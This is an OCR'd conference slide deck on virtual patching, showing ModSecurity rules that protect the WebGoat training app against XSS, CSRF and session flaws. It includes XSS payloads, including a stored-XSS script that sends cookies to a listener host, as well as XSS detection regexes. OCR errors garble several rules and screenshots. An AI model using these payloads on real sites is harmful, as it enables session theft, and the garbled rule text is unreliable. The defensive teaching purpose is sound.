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Speaker Background 



Director of Application Security Research at 
Breach Security 

- Lead Breach Security Labs 

- Develop ModSecurity Rules 
ModSecurity Community Manager 

- The go-between for development and the user 
community 

Background as an IDS/Web Security Admin 

- Operational web security for government clients 
Author 

- Preventing Web Attacks with Apache (Addison/ 
Wesley, 2006) 
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Community Projects 
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Open Web Application Security Project 
(OWASP) 

- Speaker/Instructor 

- Project Leader, ModSecurity Core Rule Set 
Web Application Security Consortium (WASC) 

- Board Member I s/\\ 

- Project Leader, Distributed Open Proxy ^J 
Honeypots 

The SANS Institute 

- Courseware Developer/Instructor 
Center for Internet Security (CIS) 

- Apache Benchmark Project Leader 
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Virtual Patching 
Introduction 

- What is it? 

- Source Code/Patching 
Challenges 

- Value 

OWASP SoC Project 

- Securing WebGoat with 
ModSecurity 

Project Solution Examples 

- Cross-Site Scripting 

• Negative Security 



• Positive Security 

• AppDefect Identification 

• HTTPOnly Cookies 

- Cross-Site Request Forgery 

• Unique Token Implementation 
via Content-Injection 

- Session Management Flaws 

• Session Hijacking/Fixation 

• Deny Invalid Sessions 

- Hidden Parameter 
Tampering 

• The Need for Lua 

Conclusion/Questions 
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S VIRTUAL PATCHING 

. WHAT IS IT? 
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What is Virtual Patching? 



A Web Application Firewall 
analyzes traffic and enforces 
the Virtual Patching Logic so 
that malicious traffic never 
reaches the web application. 



WEB APPLICATION 
FIREWALL 



NfclWOR 
SECURITY 




W£B APPLICATION 

ENVIRONMCNT 



Extranet 

ECommerce 

I ntnanet 




A Virtual Patch is a REACTIVE, 
REMEDIATION tactical response 
that relies upon some other 
process (code review, scanning or 
pentest) to identify the problem. 
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Why Not Just Fix the Code? 



High-, 



Application as 
blackliox 






Average - 
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Mostly developed in- 
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Full access to 

source and developers 

[ ] 



If you have full code 
access, fix it in the 
code. 



If you don't have code access 
or if code updates/patches will 
break functionality, then virtual 
patching may be your only 
option. 



Partial 



Little 



>Acce^^ ro application 



Image - OWASP Best Practices: Use of Web Application Firewalls 
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Vulnerability Scanning Statistics 

Time-to-Fix 



Average # of days for the top 5 URGENT severity 
vulnerabilities to be fixed 1 



SQL Injection 

Insufficient Authorization 

HTTP Response Splitting 

Directo ry Traversal 

Insufficient Authenticat en 
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Days 

Identification of the vulnerability was not the problem 
Exploit Code Availability Average - 6 days 2 
Traditional code fixes take too long... 



1 - Whitehat Website Security Statistics Report, March 2008 

2 - Symantec Internet Security Threat Report, H3, 2007 
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Why Not Just Fix the Code? 

Business Considerations 



n s §i€ Analysis 





r 




nrfi&t x 



* aaa ^** * 



Vulnerability x 
Impact x 



Cost to Fii 



lack Hat Briefings 



Why Not Just Fix the Code? 

Emergent Behavior Phenomenon 



Some vulnerabilities only manifest 
themselves in production when inter- 
connected systems share data. 

These are Architectural Flaws that 
exhibit Emergent Behaviors: 

Two pieces of code put together, one with 
a limited spec for strong data typing, 
and the other with weak handling of 
output, result in a new set of behaviors 
that fail to meet specification, though 
each unit of code individually meets it's 
own specification. 

- Arian Evans (WebSecurity Mail-list 
Post) 

May not be identifiable or correctable 
within the application's code. 
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Risk Analysis 


Architectural Risk Analysis 




Threats Vulnerabilities 
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Implementation & 
Operations 




Risk Management 
and Measurement 
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Code Reviews + Scanning + WAF 




Operations 



Virtual Patching/ 

Report App 

Defects 



Automated/ 

manual scanning 

and pentesting 
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Organizational Value 


Business Value 


r ^ 

• Allows organizations to maintain normal patching 
cycles. 

• Reduced or eliminated time and money spent 
performing emergency patching. 




Risk Value 


• Reduces risk until a vendor-supplied patch is 
released or while a patch is being tested and 
applied. 

• Protection for mission-critical systems that may 

not be taken offline. J 






Technical Value 


\ 

• Less likelihood of introducing conflicts as libraries 
and support code files are not changed. 

• Scalable solution as it is implemented in few 
locations vs. installing patches on all hosts. 
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Security Consultant Value 



When it is not possible to edit the application's code (for 
either business or technical reasons), security consultants 
are limited in the services they can provide. 

- Virtual Patching offers additional options. 
How web "multi-lingual" are you? 

- PHP, ASP/ASPNET, Java, Python, Ruby, VB.NET, C#... 

- Actual Security Consultant Quote - 

For the purpose of patching painfully old systems, that should 
really have been taken out and shot but are kept running for 
'business-reasons', I'd rather learn ModSecurlty + e.g Lua 
properly than having to learn every thinkable and 
unthinkable language and platform ever used for 
throwing together web content 
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OWASP SUMMER 
j OF CODE 
■PROJECT: 

' SECURING WEBGOAT 
5 WITH MODSECURITY 




OWASP 

The Opm l^b AppJ.Jtal'iDii Seen nty Project 

Securing WebGoat 
Using Mod Security 
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Project Team and Objective 

Project Team 

- Leader: Stephen Evans (Security Consultant) 

- 1st reviewer: Ivan Ristic & Ryan Barnett (Breach Security Labs) 

- 2nd reviewer: Christian Folini (ModSecurity Power User) 

Objective 

"To create custom ModSecurity rulesets that, in addition to the Core Set, 
will protect WebGoat 5.2 Standard Release from as many of its 
vulnerabilities as possible (the goal is 90%) without changing one line of 



source code. 



ti 
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Project Goals 



Demonstrate cutting-edge WAF capabilities 

- Wow, I didn't know (a WAF|ModSecurity) could do that?! 

Tactical use-cases for virtual patching vulnerability 
remediation 

- Anyone can download WebGoat and ModSecurity and run 
their own tests. 

Virtual Patching Options 

- Block attacks to exploit the vulnerability. 

- Address the specific, underlying WebGoat vulnerability. 

- If possible, address the underlying vulnerability generically 
so that the virtual patch could be applied to other 
applications that suffer from the same issue. 

- Alert on identified Application Defects. 
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WebGoat Overview 



^> How to wrfc with WebGoaf Mffirilla Flrefox 



Fjla Edit Wsw H£ory aoakmanVs Lools Help 



□D 




Introduction 

General 

Access Control Flaws 

AJfiX Security 

Authentication Flaws 

Buffer Overflows 

Code Quality 

Concurrency 

Crass-Site Scripting (X55) 

Denial of Service 

] mprope r E rror Han dlin o 

Injection Flaws 

Insecure Com muni cad on 

Insecure Configuration 

Insecure Storage 

Parameter Tampering 

* E:-f biL Unchrektd Email 

* Eypac-c niflnt Elda 

Session Management Flaws 
Web Services 
Admm Functions 
Challenge 



Rectart ttiiic Lc»on 



Haw To Work With WebGoat 



Welcome la a sharfc introduction to WebGoat. 

Here you will Iram hon to use WehGaot and additional tnals far the lessons. 

Eirvirui intent krf-oniialHHi 

WebGoat uses Apache Tomcat as server, It is setup to run on localhost. This configuration is 
for single user, [f you want to use WebGoat in a laboratory or in class you might need to 
change the setup. Please refer to the Tomcat Configuration in the Introduction section. 

Th*; IM4lT*K4 Of WtiltGuJI 




kril.irl IhnLriinn 
PW WV n«n« tr ^f i*ox r.flj Kifiw pn£ f«H 'JP' ft hfrni. 7h| WW ■* HBBtPa 

in hfTTP rtOMtlt 



Transferring data From 192.166,0,5., 
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Why Mod Security? 



Open Source, Free - © 

Can be deployed embedded or 
on a reverse proxy 

Deep understanding of HTTP 
and HTML 

Robust Parsing 

Anti Evasion Features 

Supports Complex Rules Logic 

Advanced Capabilities 

- Persistent Collections 

- Content Injection and Lua API 



imWHWIBIft:::::":::::-.. 



Proxy Mode 



Web 
Server 



^ 




Web 
Server 



modsecurrty 



Embedded Mode 



lack Hat Briefings 



www. modsecurity. org 
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ModSecurity Rules Language 



It's a simple event-based programming language. 



Five processing 
phases, one for 

each major 
processing step. 



Look at any part of 
the transaction. 



Transform data to 
counter evasion. 




Combine rules to 
form complex logic. 



■ r 
■ 


Common tasks are easy (the Core Rule Set), complex tasks 

are possible (Virtual Patching). 
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Example Rule Synt ax 



Tells Mod Security 
how to process 
data 



V. 







SecRule TARGETS OPERATOR [ACTIONS] 
v // /\ 





Tells 

ModSecurity 
where to look 



Tells ModSecurity 
what to do if a rule 
matches 



lack Hat Briefings 



Tools 

Testing Tools 



In order to accurately test out the 
virtual patch, it may be necessary to 
use other tools - 

- cURL - Command line web client 

- Burp Proxy - Local Proxy 

- Expresso- RegEx GUI Tool 

These tools will aid in both the 
construction and testing of virtual 
patching rules. 



burp intruder idow help 

proxy spider intruder repeater cornrns alerts 



intercept options history 



^_J : - ■■ 



forward 



drop 









® text O pararn O hex 



1200 OK 
Date: Wed, 03 Aug 2005 1 1 :1 5:05 GMT 
Sen/er: Apache 

Expires: Wed, 1 Jan 1 997 00:00:00 GMT 
Jo-Cache 

■■.■■.,.■■■.;■: : 

secure=yes; 

.. '' ' -.: ...... 

on: close 





<title>LloydsTSB online - Welcome</title> 
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Mod Security AuditViewer 



■ Thu Feb 05 08:45:49 EST 2009 



Webserver: 



192 . 163. 1. 105 



Port: 



80 



[] adjust Content-Length [ ] use SSL 



t _ Inject ../ Close 



POST /UebGoat/attack?Screen=30l£menu=1600 HTTP/ 1 . 1 

Host : www . webgoat . net 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.0.5) Gecko/2008120122 Firefox 

Accept : text/htiril, applicat ion/ xhtml +xinl, applicat ion/xinl; q=0 . 9, */*;q=0.S 

Accept- Language : en-us 

Accept-Encoding: gzip, deflate 

Accept-Charset : ISO-8859-1, utf-8; q=0 . 7, *; q=0 . 7 

Keep-Alive: 300 

Connection: keep-alive 

Ref erer : http : //www. webgoat . net/ WebGoat/attack?Screen=80l£ttienu=1600 

Cookie: JSESSIONID=D798FE2 68D3 17B3 6002 0B9D797EFF2 Al 

Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 

Content-Type : applicat ion/x-www-f orin-ur lencoded 

r"r-.>-i1-ca>-.1-_T =>-■ t-ri- V. ■ 1 £H 

<_ "J 1 ±\ 



HTTP/1. 1 2 00 OK 

Date: Thu, 05 Feb 2009 13:52:06 GMT 

Server: Apache-Coyote/ 1 . 1 

Content-Type : text/htinl; charset=ISO-8859-l 

Content-Length: 3 1115 

Keep-Alive: tirtieout = 5, itiax=100 

Connection: Keep-Alive 



. 



<!DOCTYPE html PUBLIC "-// W3C//DTD XHTML 1, 
/xhtmll-transitional . dtd rr > 



Transitional//EN rr "http://www.w3.org/TR/xhtmll/DTD 
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S SOLUTION EXAMPLE: 

. CROSS-SITE SCRIPTING (XSS) 
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Cross-Site Scripting (XSS) 



Application Defect(s) 

- Insufficient input validation 

- Application does not properly output encode user supplied data 
(meta-characters) 

Vulnerability: 

- Attacker can send JavaScript to the web application and have 
the code execute within the victim's browser 

Technique: 

- If attackers are able to insert XSS code, they may be able to 
steal SessionID credentials or do other harm 

Consequence: 

- Session Hijacking, Malware Installs, Fraud (CSRF) 
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Cross-Site Scripting (XSS) 

Reflected XSS 

Attacker tricks the victim into sending 
the malicious payload themselves (e.g 
Phishing email). 

Malicious JavaScript is sent/echoed 
back in the same transaction 



I 
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Reflected XSS Lesson 



® 



Fleeted XSS Attacks - Mozilla Fiiei 



File Edit View History Bookmarks Tools Help 




- c x ul {a 

*} Reflected XSS Attacks 



http : //www . webgoat . net/WebGoat/attack?5creen=389&nnenu=900 



& - H 



Google 



Logout 



Reflected XSS Attacks 



OWASPWefaGoatVU 

Introduction 

General 

Access Control Flaws 

AJAX Security 

Authentication Flaws 

Buffer Overflows 

Code Quality 

Concurrency 

Cross-Site Scripting (XSS) 

Denial of Service 



Solution VideosFor this exercise, your mission is to come up with Restart this Lesson 

qnnriR in nut nnnt^ininn ^ qnrint. Ynn havR tn tj^ y to get 

thisK ""Execute the script and do 



The page at http://www.webgoat.net says: 



i lesson. 




y 



£ 



Waiting for www.webgoat.net... 



# FoxyProxy: Burp &H@ 



J matches 
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Reflected XSS - Mitigations 

Input Validation 

- Negative Security - Blacklist known XSS 
using the Core Rule Set Regular Expressions 

- Positive Security - Enforce expected input for 
"field 1" parameter data 

Application Defect Identification/ 
Remediation 

- Identify if application does not properly output 
encode user supplied data 

- HTTPOnly flag missing from SessionlDs 
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Reflected XSS Mitigations 

Input Validation 



r 



Negative security model: allow all, deny what's wrong 

• Blacklist known XSS payloads using the 
ModSecurity Core Rule Set Regular 
Expressions 



Positive security model: deny all, allow what's right 



Enforce expected input for "field 1" 
parameter data 
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Core Rules - Negative Security 

Generic XSS Detection 



SecRule REQUEST_FILENAME | ARGS | ARGS_NAMES " ( ? : \b ( ? : 

(?:type\b\W*?\b(?:text\b\W*?\b(?: j (?:ava) ? | ecma | vb) | 
application\b\W*?\bx- (? : Java I vb) ) script | 
c ( ? : opyparentf older | reatetextrange) | get ( ? : special | 
parent) f older | if rame\b. { 0, 100 } ?\bsrc) \b | on (? : 
(? :mo (? :use (? : o (? : ver | ut) | down | move | up) |ve) | 
key (? :press | down | up) | c ( ? : hange | lick) |s(?:elec| 
ubmi) t | ( ? : un) ?load | dragdrop | resize | focus | blur) \b\W*? 
= |abort\b) I (? : 1 (? : owsrc\b\W*?\b (? : (?:... \ 

"phase : 

2, pass, capture, t :none, t :htmlEntityDecode, t : compressW 
hiteSpace, t : lowercase, ctl : auditLogParts= 
+E, log, auditlog,msg: ' Cross-site Scripting (XSS) 
Attack' , id: ' 950004 ' , tag: ' WEB_ATTACK/XSS ' ,logdata: ' 
TX.0} ' , severitv: '2 ' " 



o 
o 



{ 
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Updated Core Rules 

Targeted XSS for WebGoat 

<Location /WebGoat/attack> 



SecRule ARGS : f ieldl " (? : \b (? : (? : type\b\W*?\b (? : text 

\b\W*?\b (? : j (? :ava) ? | ecma | vb) | application\b\W*?\bx- 
(? : Java I vb) ) script I c (? : opyparent folder | 
reatetextrange) | get ( ? : special | parent) folder | if rame 
\b. {0, 100}?\bsrc) \b|on(?: (?:mo (?:use (?:o (?:ver |ut) I 
down | move | up) |ve) | key ( ? : press | down | up) | c ( ? : hange | 
lick) | s (? : elec | ubmi) t | (?: un) ?load | dragdrop | resize | 
focus | blur) \b\W*?=|abort\b) | ( ? : 1 ( ? : owsrc\b\W*?\b ( ? : 
(?:... \ 

"phase : 

2 , deny, capture, t : none, t : htmlEntityDecode, t : compressW 

hiteSpace, t : lowercase, ctl : auditLogParts= 

+E, log, auditlog,msg: ' Cross-site Scripting (XSS) 

Attack' , id: ' 1 ' , tag: ' WEB_ATTACK/XSS ' , logdata: '%{TX. 

} ' , severity: ' 2 ' x> 



</Location> 
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Why Negative Security Fails 



Evasions 



Canonicalization/Obfuscation Problems 

- Unicode, HTML Encoding/Decoding 

- Too many variations that result in functionality equivalent 
code 

Original form 

<script>alert ( 'XSS' ) </script> 

Using ActionScript inside Flash 

a="get"; b="URL (\""; c= M javascript :" ; 
d="alert ( 'XSS 1 ) ;\") "; eval (a+b+c+d) ; 

DIV Background Image 

<DIV STYLE="background-image : 
\0075\0072\00 6C\0 02 8 f \00 6a 
\00 61\007 6\00 61\0073\00 63\00 72\0069\0070 
\0074\003a\0061\006c 

\nnfi.s\nn7?\nn74\nn?R.ioo^ ft ^ i g^^^ 5 ^ / 
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Reflected XSS 

Positive Security Model 



<Location /WebGoat/attack> 

SecRule &ARGS_GET_NAMES : fieldl "@ge 1" "phase: 
2, t : none, log, deny, msg: ' Fieldl Parameter Found in 
Query_String. ' " 

SecRule &ARGS_POST_NAMES : fieldl "@eq 0" "phase: 

2, t : none, log, deny, msg: ' Fieldl Parameter is Missing 

from Post Payload.'" 

SecRule &ARGS_POST_NAMES : fieldl "@gt 1" "phase: 
2, t : none, log, deny, msg: 'Multiple Fieldl Parameters 
Found in Post Payload.'" 

SeRule ARGS_POST : fieldl "! A \d^}$" "phase: 
2 , t : none , log , deny , msg : ' Fieldl 
Data . " 



</Location> 




T^^* ^»*»<w*^ ^ 



Only allow 
digits 
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Reflected XSS 

Application Defect 



Failure to HTML Output Encode User Supplied Data 



v. 



Request 



► 



<IMGSRC="javascript:alert( , XSS');"> 
<IMGSRC="javascript:alert( , XSS');"> 



n. Response | 



Correct HTML Output Encoding of User Supplied Data 



Request 



• <IMGSRC="javascript:alert('XSS');"> 
<IMG SRC="javascript:alert('XSS'&#41 ;;"><^^7 



lack Hat Briefings 









□□ 
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Reflected XSS | 




ModSecurity Audit Log Entry 




^-le58114a-A-- 




1 


[05/Feb/2009:01:42:16 — 0500] SYqKSH8AAQEAABUEAsgAAAAA 
192.168.110.1 4134 192.168.110.133 80 




~le58114a-B~ 






POST /WebGoat/attack?Screen=49&menu=900 HTTP/1.1 

— CUT — 

— Ie58114a-C— 




■ 
■ 






QTYl=l&QTY2=l&QTY3=l&QTY4=l&field2=4 12 8+32 14+00 02+1 9 99&fiel 
dl=<script>alert (document, cookie) </script>&SUBMIT=Purchase 

PITT 




iS : 


^ u X 

— Ie58114a-E — 




H 


--CUT-- 






<div id="message" class="info"><BR> * Congratulations. You 
have successfully completed this lesson. <BR> * Whoops! You 
\entered <script>alert (document. cookie) </script> instead of 
i your three digit code. Please try again. </div> 
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App Defect Rule Set 

Dynamic Taint Propagation' 1 

Follow untrustea data and identify points where they are misused 



Use ModSecurity's built-in Transactional Collection (TX) 



Use the "setvantx" action 




^ 



Inspect Request Parameter Payloads 



9 




Monitor inbound payloads for meta-characters 
that could be used in an XSS attack 



Set a TX variable that holds this data 



\7 



Inspect Current Response Body Payload 



Check outbound response data for the exact same user-supplied data 



1- Fortify - B. Chess/J. West 
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Reflected XSS 

App Defect Rule 



SecRule ARGS " ( [\ ' \"\ (\) \;<>#] ) " "chain, phase 
4, t : none, log, audit log, deny, status : 
403, id: ' 1 ' ,msg: ' Potentially Malicious Meta- 
characters in User Data Not Properly Output 
Encoded . ' , logdata : ' % { tx . inbound_meta- 
characters } ' " 

SecRule MATCHED_VAR " A . { 15 , } $ " 
"chain, t : none, setvar : tx . inbound_meta- 
characters=% {matched_var } " 

SecRule RESPONSE_BODY 
"^contains % { tx . inbound_meta-characters } " 
"ctl :auditLogParts=+E" _ 
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Rule and Debug Log Data (1) 






w 



SecRule ARGS " ( [ \ ' \"\ (\) \; <>#] ) " "chain, phase : 
4 , t :none, log, audit log, deny, status : 
403, id: ' 1 ', msg: ' Potentially Malicious Meta- 
characters in User Data Not Properly Output 
Encoded. ' , logdata : ' % { tx . inbound meta-characters } ' 

Rule 81c0640: SecRule "ARGS" "@rx ( [\\ ' \"\\ (\\) \ 
\;<>#] ) " "phase: 

2, log, audit log, pass, chain, t : none, setvar : tx . inbound_met 
a-characters=% {matched_var } x> 

[4] Executing operator "rx" with param " ( [\\ ' \"\\ (\\) \ 

\ ;<>#] ) " against ARGS : f ieldl . 
[9] Target value: "<script>alert (document. cookie) </ 

script>" 

[9] Added regex subexpression to TX.O: < 
[9] Added regex subexpression to TX.l: < 
[4] Operator completed in 28 usee. 
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Rule and Debug Log Data (2) 



SecRule MATCHED_VAR " A .{15,}$" 

"chain, t : none , setvar : tx . inbound_meta-characters=% 

{matched_var } " 

[5] Rule 81d6a30: SecRule "MATCHED_VAR" ff @rx A .{15,}$" "phase: 
2, log, audit log, pass, chain, t :none, setvar : tx. inbound_meta- 
characters=% {matched_var } ff 

[4] Transformation completed in 2 usee. 

[4] Executing operator "rx" with param " A .{15,}$" against 
MATCHED_VAR. 

[ 9] Target value : ff <script>alert (document . cookie) </ script >" 

[4] Operator completed in 3 usee. 

[ 9] Setting variable : tx . inbound_meta-characters=% {matched_var } 

[9] Resolved macro %{matched_var} to 

"<script>alert (document. cookie) </script>" 
[9] Set variable " tx . inboundjne ta-characters " to 

"<script>alert (document. cookie) </script>" . 

[4] Rule returned 1. 
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Rule and Debug Log Data (3) 



SecRule RESPONSE_BODY "@contains % 

{ tx . inbound_meta-characters } " "ctl : auditLogParts= 

+E" ~~ 

[4] Executing operator "contains" with param "% 

{tx.inbound_meta-characters} " against RESPONSE_BODY. 

[9] Target value: "\r\n\r\n\r\n< ! DOCTYPE html PUBLIC "-//W3C// 
DTD XHTML 1.0 Transitional//EN" 

--CUT-- 

[9] Resolved macro % { tx. inbound_meta-characters } to 

"<script>alert (document .cookie) </script>" 
[4] Ctl: Set auditLogParts to ABIFHZE. 

[2] Warning. String match "<script>alert (document. cookie) </ 
script>" at RESPONSE_BODY. [file "/usr/local/apache/conf / 
core-rules_l . 6 . 2/modsecurity_crs_15_customrules . conf " ] [line 
"17"] [id "1"] [msg "Potentially Malicious Meta-Characters in 
User Data Not Properly Output Encoded."] [data 



'<script>alert (document . cookie) </script>" ] 



lack Hat Briefings 



Cross-Site Scripting (XSS) 



• Stored XSS 

! • Attacker is the one who sends the 

:: malicious payload to the application. 

"• Victim views the malicious payload at 

/ another time. 

• Malicious JavaScript is sent/echoed back 

■ in different transactions 

• Negative/Positive Security rules presented 

■ . for Reflective XSS still work to block the 
inbound attack 
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Stored XSS Lesson - Stealing 



Select /cygdrive/c/Documents and Settings/rbarnett/My Documents 



m 



ettOMOAE /cygdrr 



jET /Testing/' 
Host: 192.168.1.104:38! 
Us er -Agent : Mozi 1 1 a/ 5 . ( 
Accept : image/png , irnag* 
^ccept-Language : en-us 
4ccept-Encodi ng : qzi p , ( 
Accept -Char set: : 



"npft/Mv nririJinprn 



)SESSIONID=1034CF824DE6008F47DE64D06B2 5ADlF 



>ws ; U; Windows 
:,*/*;q=0-5 



;; rv:1.9. 



HTTP/1.1 



720081201; 









TesT 



J, 



L-ross-bite scripting {?,■*■*} 

Fhishing with XSS 

LAB: Cross Site Scripting 

Stage 1: Stored XSS 

Stage Z: Block Stored XSS 
using Input Validation 

Stage 3: Stored XSS 
Revisited 

stage 4: Block stored xss 
using Output Encoding 

Stage 5: Reflected XSS 

Stage 6: Block Reflected XSS 

Stored XSS Attacks 

Cross Site Request Forgery 

m 

^ Reflected XSS Attacks 

HTTFQnlvTest 

Cross Site Tracing tXSTj 
Attacks 



-me: 

Message 



<scuipt> 

vau inig = new Image () ; 

img.si:c="http://192 . 168. 1. 104 : 3888/ Testing 

/CookiesAdd. aspx?Ck=" + document . cookie; 

</script> 



Submit 



Message List 



OWASP Foundation | Project WebGoat | Report Bug 



ASPECT 

1 A ftf tiftWrftA T^TJiriTj ^HfWBjpt 



V 



Transferring data from www.webgoat.net.. 



-$£ FoxyProxy: Disabled ^sl§; 
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App Defect Rule Set 

Stored XSS 



Use ModSecurity's Global Persistent Collection (GLOBAL) 



Use the "initcol:global=" and "setvanglobal." actions 




^ 



Leverage the Reflected XSS Rules 




Set a variable in the GLOBAL collection that holds this data across transactions 



^J 



Inspect ALL Response Body Payloads 



Check outbound response data for the exact same user-supplied data 
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Stored XSS 

App Defect Rule 



SecAction "phase : 1 , nolog, pass , initcol : global=xss_list" 

...Reflected XSS Rules Here... 

SecRule GLOBAL: ' /XSS_LIST_. */ ' "@streq "phas% 
{ tx . inbound_meta- characters } " e : 

4 , t :none, nolog, pass, skip: 1" 

SecRule TX : INBOUND_META-CHARACTERS " . * " "phase : 
4, t:none, nolog, pass, setvar : global .xss_list_% 
{time epoch }=%{ matched var}" 



SecRule GLOBAL: ' /XSS_LIST_. */ ' "@within % 
{response_body} " "phase: 

4 , t : none, log, auditlog, pass,msg: 'Potentially Malicious 
Meta-Characters in User Data Not Properly Output 
Encoded ' , tag : ' WEB ATTACK/XSS ' " 
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Viewing Persistent Collections 



# Java -cp /root/org. j wall. tools . jar 
org . jwall . tools . CollectionViewer /tmp/ 

Collection global, last read @ Thu Feb 05 02:01:18 EST 2009 

Created at Thu Feb 05 01:42:16 EST 2009 

global [xss_list] .xss_list_1233816136 = 
<script>alert (document . cookie) </script> 

global [xss_list] .xss_list_1233817131 = 

<SCRIPT>alert (StringTf romCharCode (88, 83, 83) ) </SCRIPT> 

global [xss_list] .xss_list_1233817276 = <META HTTP- 
EQUIV="refresh" CONTENT="0; 
URL=http://;URL=javascript: alert ( 'XSS' ) ; "> 

global [xss_list] .xss_list_1233817198 = <BASE 
HREF=" javascript: alert ( 'XSS' ) ;//"> 

global [xss_list] .TIMEOUT = 3600 

This collection expires in 59m 57.242s 
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Collection Viewer- www.jwall.org 



Application Defect Mitigation 

Missing Cookie Protections - HTTPOnly Flag 

Defect: 

- Application does not use the HttpOnly Cookie Option 

Vulnerability: 

- The HttpOnly cooking flag option helps to prevent client-side 
code from access the cookie data within the browser 

Technique: 

- If attackers are able to insert XSS code, they may be able to 
steal SessionID credentials 

Consequence: 

- Session Hijacking 
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Missing HTTPOnly Flag 



© burp suite v1.1 
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jj Missing HTTPOnly Rule Set 

Mod Security + Apache 



Use Mod Security to Inspect Outbound Set-Cookie Data 



Check for SessionlDs that are missing the HTTPOnly flag 




^ 



Use ModSecurity's "setenv" action 



ENV data holds the initial Set-Cookie data 



^j 



Apache can access/update this data using the Header directive 







Issue a new Set-Cookie header that appends HTTPOnly to the end 



lack Hat Briefings 



Missing HTTPOnly Flag 

App Defect Rule 



SecRule RESPONSE_HEADERS : /Set-Cookie2?/ "!(?i: 
\;? ?httponly;?) " "chain, phase : 
3, t : none, pass, no log" 

SecRule MATCHED_VAR "(?i: ( j ?sessionid | (php) ? 
sessidl (asp | jserv| jw) ?session[-_] ? (id) ? | cf (id | 
token) | sid) ) " "t : none, setenv:http_cookie=% 
{matched var}" 



Header set Set-Cookie "% {http_cookie }e; 
HTTPOnly" env=http cookie 
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HTTPOnly Flag Added 



' LAB: Cross Site Scripting - Mozilla Firefox 



File Edit View History Bookmarks Tools Help 

~ e x ul cn 



http : //www . webgoat . net/WebGoat/attack?5creen=349&rinenu=900 



ft- H 



Google 



J*J LAB: Cross Site Scripting 




Introduction 

General 

Access Control Flaws 

AJAX Security 

Authentication Flaws 

Buffer Overflows 

Code Quality 

Concurrency 

Cross-Site Scripting (XSS) 

Denial of Service 



) Restart this Lesson 

Edit Profile page. Verify 



tf Goat His Financial 

J* Human Resources 



m 



Search For User 
Employee larry 



Transferring data from www.webgoat.net.. 



3» 



£ 



-& Foxy Proxy: Disabled 
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I ' SOLUTION EXAMPLE: 

. CROSS-SITE REQUEST FORGERY 
= '(CSRF) 



I 
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Cross Site Request Forgery 

(CSRF) 

Defect: 

- Application uses Implicit Authentication based on SessionID Cookie 
data 

- Also known as Session Riding, One-Click Attacks, etc... 
Vulnerability: 

- Web browsers automatically send SessionID data with requests 
Technique: 

- An attack that tricks the victim into loading a page that contains a 
malicious request. 

- In a forum, the attack may direct the user to invoke a logout 
function 

- Can be combined with XSS 

Consequence: 

- Fraud 
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WebGoat CSRF Lesson 



B Cross Site I © burp suite v1 . 1 



File Edit Vie 



Stage 
usin; 

Stage 
Revi;- 



http://localhost:E 



burp intruder repeater window help 



ff^ H spider r intruder \ repeater \ sequencer T decoder f^^Pf comms fliite 



[intercept options history 



request to http://www.webgoat.net:30 [1 92.1 68.1 .1 05] 



forward 



drop 



intercept is on 



action 



raw \ pararns \ headers \ hex \ render Tviewstate 



|GET/WebGoat/attack?Screen=41 7&menu=900&transferFunds=5000 HTTP/1 .1 

Host: www.webgoat.net 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US; rv:1 .9.0.5) Gecko/20081 201 22 Firefox/3.0.5 

Accept: image/png,image/*;q=0.8*/*;q=0.5 

Accept-Language: en-us 

Accept-Encoding: gzip.deflate 

Accept-Charset: ISO-8859-1 ,utf-8;q=0.7*;q=0.7 

Keep-Alive: 300 

Proxy-Connection: keep-alive 

Referer: http://localhost:8080/WebGoat/attack?Screen=417£.menu=900&Num=38 
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CSRF Mitigation 

Adding Unique Tokens via Content Injection 



Use ModSecurity's Session Persistent Collection 



Data is saved for each Session ID 




^ 



Create/Inject Unique Token Value into Response Data 






Use "t:sha1" action to capture 
hash of JSESISONID 



Use "append" Content 
Injection action 



Uses csrf.js script from 
OWASP CSRFGuard 



=7 



Validate CSRF Token Data on Subsequent Requests 



Check that CSRF Token exists and data matches the saved CSRF Hash data 
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CSRF Rules (1) 

Storing/Injecting Unique Tokens 



SecContentlnjection On 

SecRule RESPONSE_HEADERS : /Set-Cookie2?/ " ( ?i : j sessionid= ( [a-f0-9]+) \; 
\s?) ff ff chain , phase : 3, t : none, pass, no log, capture, setsid:%{TX. 
1 } , setvar :session.sessionid=%{TX.l}" 

SecRule SESSION: SESSIONID "(.*)" 
11 1 : none , capture , t : shal , t : hexEncode , setvar : session . csrf token=% { TX . 1 } " 



SecRule REQUEST_FILENAME "/WebGoat /attack" "phase: 

4 , t : none, nolog, pass, append: ! <script language=\" JavaScript\"> \ 

var tokenName = \ f MODSEC_CSRF_TOKEN\ f ; \ 

var tokenValue = \ f %{ session. csrf token}\ ! ; \ 



\ 
--CUT-- 

</script> 
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CSRF Rules (2) 

Validating Tokens 



SecRule &ARGS "@ge 1" "chain, phase : 

2, t : none, deny, log, ctl : auditLogParts=+E,msg: 'CSRF 

Attack Detected - Missing CSRF Token.'" 

SecRule &ARGS:MODSEC CSRF TOKEN " ! @eq 1" 



SecRule &ARGS "@ge 1" "chain, phase : 

2, t : none, deny, log, msg: 'CSRF Attack Detected - 

Invalid Token . ' " 

SecRule ARGS :MODSEC_CSRF_TOKEN "!@streq % 
{SESSION. CSRF TOKEN}" 
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CSRF Content Injection 



© POST request to http://www.webgoat.net/WebGoat/attack?Screen=118amenu=900 



( request [ modified request f response 



previous 



next 



action 



raw params headers hex viewstate 



POST/WebGoat/attack?Screen=1 1 8&menu=900 HTTP/1 .1 

Host: www.webgoat.net 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US; rv:1 .9.0.6) Gecko/200901 1 91 3 Firefox/3.0.6 

Accept: te)d/html,applicationAchtml+xml I application/Kml;q=0.9*/*;q=0. 8 

Accept-Language: en-us 

Accept-Encoding: gzip.deflate 

Accept-Charset: ISO-S859-1 ,utf-8;q=0.7 *;q=0.7 

Keep-Alive: 300 

Proxy-Connection: keep-alive 

Referer: http://vMW.web go at. neWVeb Go at/attack? Sere en=1 1 8&menu=900&MODSEC_CSRF_TOKEN=4ffc9823f93eb1 20003781 59c7536096592d41fd 

Cookie: JSESSIONID=44652680ECCB7A6CAC039DDD1 37FF01 E 

Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 

Content-Type: application/y-www-form-urlencoded 

Content-Length: 123 

title=Nice+Site%21&message=l+like+this+site+%3A%29&SUBMIT=Submit&MODSEC_CSRF_TOKEN=4ffc9823f93eb1 20003781 59c7536096592d41fd 



matches 
